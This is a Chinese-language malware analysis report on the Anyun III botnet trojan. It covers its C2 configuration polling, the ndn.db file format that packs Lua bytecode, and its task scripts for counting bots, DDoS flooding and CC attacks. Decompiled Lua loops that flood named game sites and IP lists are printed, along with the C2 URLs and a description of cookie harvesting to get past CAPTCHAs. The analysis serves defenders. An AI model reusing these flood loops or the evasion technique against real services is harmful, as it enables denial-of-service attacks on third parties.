暗云Ⅲ危害——不仅仅是DDOS

  前面对暗云的分析报告中,已经基本清楚了暗云Ⅲ的感染方式和传播方式。也知道被感染暗云Ⅲ的机器会在启动时从服务端下载任务脚本包——ndn.db文件,且该文件会常进行更换,在编写危害分析报告时,笔者已收集到多个不同功能的ndn.db文件。

0x01 暗云PAYLOAD行为分析

  在解析db文件前,先过一次暗云payload行为:

Alt text
  木马每5分钟会联网下载一次配置文件 http://www.acsewle.com:8877/ds/kn.html

Alt text
  该html是个配置文件,木马会检查其中的版本号,并保存,其后每次都会比较,以确定是否更新,如果有更新则会重新下载新版本 。

Alt text
  如果有更新,则下载新版本,并根据配置下载文件执行或者创建svchost.exe傀儡进程执行。

Alt text
  木马干活模块lcdn.db其实为lua脚本解析器,主要功能下载任务db,进而解析执行:

Alt text

Alt text

0x02 任务脚本文件结构

  通过分析,得知ndn.db的文件结构,大致如下:

struct f_db{
DWORD fileLen; // lua脚本bytecode文件大小
DWORD runType; // 运行类型
char fileName[24]; // lua脚本文件名
char fileData[fileLen]; // lua脚本bytecode内容
}

  如下图中,红色框为文件大小,灰色框为运行类型,蓝色框为文件名,紫色框为真实的bytecode内容。

Alt text

  根据文件结构,进而可从ndn.db中提取到多个lua脚本的bytecode

Alt text

0x03 任务脚本功能分类

  分析得知,其使用的lua版本为5.3,是自行更改过虚拟机进行编译。使用普通反编译工具反编译后,只能得到部分可读明文,经过分析统计可知道暗云Ⅲ现有发布的功能大致有以下几类:

0x01 统计类

  解密得到的111tj.lua脚本,实则为参与攻击机器统计脚本。

Alt text
  该脚本主要作用为:每隔五分钟,带Referer:http://www.acsewle.com:8877/um.php访问cnzz和51.la两个站点统计页面,以便统计参与攻击的机器数及次数。
  统计页面地址为:
http://c.cnzz.com/wapstat.php?siteid=1261687981&r=&rnd=1626837281
http://web.users.51.la/go.asp?svid=15&id=19133499&tpages=1&ttimes=1&tzone=7&tcolor=24&sSize=1802,850&referrer=&vpage=http%3A//www.acsewle.com%3A8877/tj.html&vvtime=1489555372270
  访问流量:

Alt text

0x02 DDOS类

  这类脚本,简单粗暴,直接do、while循环,不停地对目标服务发起访问。如下为dfh01.lua中代码,其目标是针对大富豪棋牌游戏。

L1_1.get = L4_4
L4_4 = {
"182.86.84.236",
"119.167.151.218",
"27.221.30.113",
"119.188.96.111",
"113.105.245.107"
}
while true do
url = "http://" .. "web.168dfh.biz" .. "/"
L1_1.get(url)
url = "http://" .. "web.168dfh.cn" .. "/"
L1_1.get(url)
url = "http://" .. "web.168dfh.top" .. "/"
L1_1.get(url)
end

  又如,dfhcdn01.lua中:

while true do
sendlogin("114.215.184.159", 8002)
sendlogin("114.215.169.190", 8005)
sendlogin("114.215.169.97", 8002)
sendlogin("121.41.91.65", 8005)
sendlogin("123.56.152.5", 8000)
sendlogin("121.199.2.34", 8002)
sendlogin("121.199.6.149", 8000)
sendlogin("121.199.15.237", 8002)
sendlogin("101.200.223.210", 17000)
sendlogin("121.199.14.117", 8002)
sendlogin("112.125.120.141", 9000)
sendlogin("123.57.32.93", 9000)
end

  再如,在new59303.lua中:

Alt text

0x03 CC攻击类

  解密得到的yiwanm001.lua脚本中,包含有各类UserAgent,在发起攻击时,会随机使用这些UserAgent来对目标网站发起访问,此外该脚本还将监测是否跳转到验证码页面,并自动提取Cookie完成访问。
  随机UA:

Alt text
  获取Cookie

Alt text
  这个脚本攻击的目标为m.yiwan.com。为了精确到指定目标,脚本中还写死了两个服务器ip。

L6_6 = "http://139.199.135.131:80/"
L7_7 = "http://118.89.206.177:80/"

  循环访问,遇到验证码则跳转到GetCookie函数。